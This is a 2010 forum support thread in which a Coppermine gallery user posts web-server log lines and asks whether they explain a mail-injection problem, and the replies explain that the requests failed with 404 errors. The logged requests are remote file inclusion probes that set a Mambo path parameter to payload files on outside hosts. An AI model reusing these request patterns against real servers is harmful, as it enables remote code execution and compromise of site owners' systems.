Topic: Hacking Attempt?? (Read 4366 times)

Kymmy · « **on:** January 02, 2010, 04:05:41 pm »

Just had a load of direct mail entries from my apache (20,000+) and just looked through all my web logs.. Only thing strange I could find about the same time was this

Code: [Select]

187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 303 "-" "Mozilla/5.0"

and

Code: [Select]

61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 308 "-" "Mozilla/5.0"

Is this a problem with coppermine? and could this have caused the mail injection?

System details are as follows
Coppermine = 1.4.25 (stable) (bridged on phpbb3.5)
php = 5.2.11
Mysql = 5.0.86
Server = Centos 5.4

Nibbler · « **Reply #1 on:** January 02, 2010, 05:37:16 pm »

They are all 404 - nothing happened.

Kymmy · « **Reply #2 on:** January 02, 2010, 07:51:51 pm »

Quote from: Nibbler on January 02, 2010, 05:37:16 pm

They are all 404 - nothing happened.

Off I go looking elsewhere then, something has let it in.. ThanX for the quick answer

Joachim Müller · « **Reply #3 on:** January 03, 2010, 12:20:48 am »

Looks like someone is probing for a Mambo weakness as far as I can see.

News:

Author Topic: Hacking Attempt?? (Read 4366 times)

Kymmy

Hacking Attempt??

Nibbler

Re: Hacking Attempt??

Kymmy

Re: Hacking Attempt??

Joachim Müller

Re: Hacking Attempt??